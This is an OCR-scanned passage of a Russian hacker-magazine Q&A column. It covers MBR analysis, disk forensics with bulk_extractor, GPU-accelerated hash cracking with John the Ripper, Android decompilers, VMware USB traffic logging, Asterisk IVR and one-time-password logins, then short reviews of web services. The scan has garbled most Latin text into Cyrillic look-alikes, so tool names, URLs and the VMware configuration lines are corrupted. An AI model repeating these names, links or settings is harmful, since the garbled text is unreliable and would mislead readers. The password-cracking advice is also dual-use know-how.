упереться в производительность сетевой 
карты или дисков, обслуживая, к примеру, 
750 тысяч запросов к мускульной таблице 
в секунду! 

О: Все больше и больше вирусов зара- 
жают /Ѵ\ВР, хочу научиться отслеживать 
подобные ситуации. Какие утилиты мож- 
но использовать для анализа /Ѵ\ВР? 

А: Одним из самых полезных инструментов, 
которые я видел для исследования МВР, 
является набор Регі-скриптов Вооі; РесогсІ 
Рагзегз ( ѵѵѵѵѵѵ.дагѵкеггіег.пеі/зоі'іѵѵа ге/іпсіех. 
ЫтО . в который помимо прочего входят: 

• тЬграгзег— парсер ВОЗ/ѴѴіпсІоѵѵз Мазіег 
Вооі РесогсІ (МВР); 

• Ьзрагзег — парсер загрузочных секторов 
РАТили МТР5. 

Чтобы лучше вникнуть в тему, рекомендую 
тебе прочитать статью «Ап Ехатіпаііоп оі 
Ібе Зіапсіагб МВР» [ Ыиу/к18АУУа ]. 

О: Подскажи способ максимально 
быстро исследовать жесткие диски на 
наличие некоторого контента. Для при- 
мера возьмем етаіі-адреса. 

А: В кругу компьютерных криминалистов все 
чаще называют программу ЬиІк_ех1;гас1;ог 
( аІШЬ.огд/зоИѵѵаге/ЬиІк ехігасіог ). Это на- 
писанная на С++ утилита, которая скани- 
рует образ диска, файл, или директорию с 
файлами и баснословно быстро извлекает 
разного рода информацию. Скоростьдо- 
стигается за счеттого, что ЬиІк_ех1;гас1;ог 
не парсит структуры файловой системы, а 
работает с жестким диском напрямую, при 
этом может работать с разными участками 
образа параллельно. 

При этом программа можетсканировать 
как обычный НОВ, так и 55В, оптические 
носители, карты памяти, дампы сниффера 
и т.д. Существующие модули позволяют из- 
влекать, к примеру, номера кредитных карт 
(что очень ценно для тех, кто занимается 
сіідііаі Іогепзісз), информацию ЕХІР из фото- 
графий и видео, ІР/МАС/ЕтаіІ-адреса, ВРЕ 
и т.д. Результаты обычно имеют довольно 
громоздкий вид, поэтомудля последующей 
обработки результатов разработчики пред- 
лагают ряд вспомогательных скриптов на 
Руібоп’е. 

О: Какой сейчас самый быстрый способ 
взломать /Ѵ\05 и другие хэши? 

А: Если не брать в расчет радужные табли- 
цы, а также распределенные системы, то од- 
ним из лучших вариантов является старый 
добрый 5обп1;беРіррег ( ѵѵѵѵѵѵ.орепѵѵаи.сопп/ 
]обп ) с набором патчей, которые используют 
для ускорения возможности видеокарты. 

Для разного вида хешей используются раз- 



личные технологии ускорения за счет СРВ: 

• ОрепСЕ: МТ, га\л/-МВ4, га\л/-МВ5, М5ЕВАР 
и га\л/-5НА1 ; 

• СВВА: га\л/-5НА256, рбразз. 

Раз ужмывспомнилипро5обп1;беРіррег, не 
могу не упомянуть, что с недавнего времени 
утилита научилась брутить не только хэши, 
НОИ пароли к архивам 21 Р и РАР, РВЕ- 
документам, а также 55Н- ключ и. Рекомен- 
дую посмотреть та кжетулзу ідбазбдри от 
Ивана Голубева ( Ьѵѵѵѵ.доІиЬеѵ.сопп/Ыод ]. 

О: Какие программы используют для 
реверсинга АпбгоісІ-приложений? Отсут- 
ствие жестких политик внутри магазина 
приложений АпбгоісІ тагкеі иногда на- 
стораживает — хочется самому убедить- 
ся, что установленная программа не 
будет отправлять на платный номер. 

А: Начну с небольшого пояснения. Устрой- 
ство на базе АпбгоісІ может выполнять при- 
ложения, которые были сконвертированы 
в специальный формат - Ваіѵік ЕхесиІаЫе 
(.бех). Для таких бинарников существует 
немало декомпиляторов. Талантливый 
китайский студентеще в прошлом годуопу- 
бликовал утилиту бех2]аг [ собе.доодіе.сот/р/ 
бех2]аг), преобразующую .бех-бинарники в 
читаемый баѵа-код, который удобно просма- 
тривать через бВ-ОВІ [ ]аѵа.бесоппрі[ег.Ігее. 

Іг). Еще одним известным декомпилятором 
является зтаіі ( собе.доодіе.сот/р/зтаіі ). 
Среди прочих подобных продуктов выде- 
ляется Кіѵіаб [ ѵѵѵѵѵѵ. т а Іа за по . сот 1 . который 
нативно работаете Оаіѵік-байкодом и пре- 
образует его напрямую в б аѵа- байткод, что 
дает результат гораздо лучшего качества. 
Декомпилятор написан на РиЬу и работает 
под ѴѴіпбоѵѵз, Еіпих и 05Х. 

О: Какие есть инструменты, чтобы по- 
смотреть, как на самом низком уровне 
взаимодействуют драйвер и ЕІ5В- 
устройство? 

А: Возможность логировать Е15В-трафик 
позволяет, к примеру, ѴМѵѵаге. Для этого в 
конфиг виртуальной машины (ѵтх-файл) 
нужно добавить следующие строки: 

иБЬ.апаІуіег.епаЫе = ТКІІЕ 
топіііог = "беЬи§" 
иБЬ.апаІуіег.шахІіпе = 8192 
гпоиБе.ѵиБЬ.епаЫе = РА15Е 

После этого весьтрафик в виде «как есть» 
будетлогироваться в файл ѵтѵѵаге.іод. В 
таком дампе без вспомогательных инстру- 
ментов сам черт ногу сломит, поэтому лучше 
сразу взять внапарникиещеи прогу ѵзизЬ- 
апаіузег ( ѵизЬ-апаІѵгег.зоигсеІогде.пеІ:/ 
ІиІогіаІ.ЫтІ ). Помимо этого можно преобра- 
зовать получившийся лог в более привыч- 
ный РСАР-формат, воспользовавшись на- 
писаннымна РиЬу скриптом ѵт\л/и5Ь2рсар. 
гЬ ( ЬіЕ[у/[а7А]и ). 



О: Когда звонишь в саІІ-центр какой- 
нибудь компании, то сразу попадаешь на 
автоматизированную систему. «Нажми- 
те О для связи с оператором», «Нажмите 
1 для того, чтобы узнать баланс» и т.д. 
Нужно реализовать что-то подобное, 
как? 

А: Речь идет об ІѴР (англ. Іпіегасііѵе Ѵоісе 
Резропзе), системе предварительно за- 
писанных голосовых сообщений, выпол- 
няющей функцию маршрутизации звонков 
внутри саЕ-центра. 

Пользователь общается с та кой систе- 
мой посредством тонального набора. 
Реализовать ІѴР можно с помощьюуже 
наверняка знакомо го тебе проекта Азіегіх 
( ѵѵѵѵѵѵ.азіепзк.огд ). Всю логику простой 
ІѴР-системы можно реализовать через 
конфиг ехІепзіопз.сопЕ но для сложных за- 
дач лучше использовать возможности АОІ. 
Это скрипты на Регі или Руібоп, с помощью 
которых можно создать довольно слож- 
ные сценарии работы голосового робота. 
Реализация через Азіегіх очень дешева, но 
при этом весьма масштабируема. На самом 
обычном компьютере могут одновременно 
обслуживаться сотни звонков без каких- 
либо затруднений. 

Поднять самую простую ІѴР можно по этой 
несложной инструкции: ЫЕ[у/1М]26к . Замечу, 
что таким образом можно создавать и авто- 
матических роботов, которые будут обзвани- 
вать абонентов, к примеру, с напоминанием 
об оплате счета. 

О: Мне очень нравится возможность 
двухс|эакторной авторизации у Ооодіе, 
когда для входа требуется ввести еще 
и одноразовый пароль, который по 
особому алгоритму генерируется на 
телес|эоне. Есть ли готовое подобное 
решение, которое можно подключить 
к своему ресурсу для усиления защиты 
пользователя? 

А: Есть несколько коммерческих серви- 
сов, которые можно красиво интегри- 
ровать в свои продукты: Оуо ЗесугІІу 
( ѵѵѵѵуѵ.сіиозесигііу.сопп ) и Зутапіес’з ѴІР 
Аиібепіісаііоп Зегуісе ( ѵѵѵууѵ.уегізідп.сот ]. 
При должном желании можно сэкономить 
и реализовать все самому, используя 
разработку МоЬіІе-ОТР ( тоІр.зоигсеЬгде. 
пеі ). Клиентская часть, с помощью которой 
пользователю будет выдаваться одноразо- 
вый пароль, написана на 5ауа и может быть 
запущена практически на любом современ- 
ном устройстве, а на сервере может быть 
использован РАПІЕІ5-сервер (например, 
ХТРасІіиз), с помощью которого будет выпол- 
няться авторизация. Ты можешь справед- 
ливо заметить, что на АпбгоісІ или іРбопе 
запустить 5ауа-приложение не выйдет. Так 
и есть, но энтузиасты уже написали при- 
ложения для генерации токенов и для этих 
платформ.-^-^ 
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ОБЛАЧНЫЕ ВЫЧИСЛЕНИЯ НА СЛУЖБЕ У ПЕНТЕСТЕРА стр 66 







I 








ІтісІотГ 



$опд8 Гготп а весгеі 
Сагсіеп 

^ Зяспсі Еагсісп 



ТПІ5 №ё Ёопд уйіі МЁге Іййкіпд іЬг 



5опд Ггот а Зеспеі; Сэгсіёп 




Для определения 
музыки на слух 




МЮОМІ 

ѵѵѵѵѵѵ.тісіоті.сот 

©Ни одно другое мобильное приложениетак не впечатляетлюдей, как 
ЗЬагат или его аналогЗоипбНоипб. Все просто: они умеют определять 
исполнителя и композицию «на слух». Каждый из нас задавался вопро- 
сом, что это сейчас играет (например, по радио), а подобные инструмен- 
ты быстро дают ответ. Та же самая технология лежит и в онлайн-сервисе 
тіботі. Через простой интерфейс можно снятьзвукс микрофона и 
быстро получить информацию о произведении. Алгоритмы настоль- 
ко изящны, что можно даже самому на петь за пом пившийся отрывок 
произведения — и сервис зачастую найдет правильное совпадение. 
Получилосьдажеу меня, без слуха и без голоса. Вау! Вотэто тизіс 
бпдегргіпбпді 



ООООІЕ 5ѴѴІРРУ 

5\л/іТІу.аооаІеІаЬ5.сот 

О В то время как НТМ15 шагает по планете, Ріазб все больше и больше 
притесняют. Отказаться от использования прожорливого по части ре- 
сурсов Ріазб’атам, где это можно — это вообщетренд сегодняшнего дня. 
Не секрет, что в стандартных мобильных браузерах іРЬопе и іРаб и ряда 
других девайсов вообще нет Ріазб-плеера. Интерактивный контент, 
построенный на технологии АбоЬе, просто не отображается. Ксчастью, 
для владельцев сайтов и приложений на флешетеперьесть макси- 
мально простой способ преобразовать Ріазб 5ѴѴР в файл в НТМР5. Этим 
занимается новое веб-приложение от Ооодіе — ЭѵѵіР'у. Сейчас поддер- 
живается 5ѴѴР 8 и АсбопЭсгірІ: 2.0, а результат корректно работает во всех 
браузерах на движке ѴѴеЬКіІ: (Сбготе, МоіЫе Эаіагі и т.д.). 





Для работы со 
списками дел 



АоовЕ ВРОѴѴ5ЕРІАВ ѵѵимоЕризт 

Ьго\л/зег1аЬ.ас1оЬе.сот \л/\л/\л/.\л/ипсіегІізІ.сот 



©Занимаясь глобальной переработкой нашего сайта (маленький 
тизер, ага), мы столкнулисьс проблемой тестирования верстки в разных 
браузерах. Находкой оказался сервис ВгоѵѵзегІаЬ. Вообще сам факттого, 
что это продукт АО обе — уже гарант качества. Через удобный интерфейс 
ты можешь проанализировать, какзапрошенный сайт отображается 
в самых разных браузерах и ОС без необходимости устанавливать в 
системе дополнительный софт и системы виртуализации. Нужно только 
вбить иве нужного сайта. Адальше можно просто переключаться между 
видами, сравнивать их, расположив рядом или даже наложив один на 
другой, выравнивать по сетке и т.д. Очень качественная реализация 
идеи, которая пока предоставляется совершенно бесплатно. 



© Не могу не рассказать об этом замечательном сервисе для состав- 
ления списка дел. Что мне нравится в ѴѴипбегбзІ;, та к это глобальная 
кроссплатформенность. Сейчас доступны веб-интерфейс, полноцен- 
ные клиенты для ѴѴіпбоѵѵз и МасОЗХ, а также мобильных платформ 
Апбгоіб и іРбопе/іРаб. Все задачи из списка ТОВО всегда засинхро- 
низированы: если ты добавил что-то с телефона, то это тутже отобра- 
зится в веб-интерфейсе. Мало этого, ѴѴипбегИзІ: предлагает работать 
над списками дел совместно, поэтому это еще и простейшая система 
управления проектами. Сервис нетолько бесплатный, но еще и откры- 
тый (исходники доступны на дііЬиЬ.сот/бѵѵипсІегкіпсІег ). Примечатель- 
но, что продукт написан на платформе Тііапіит. 
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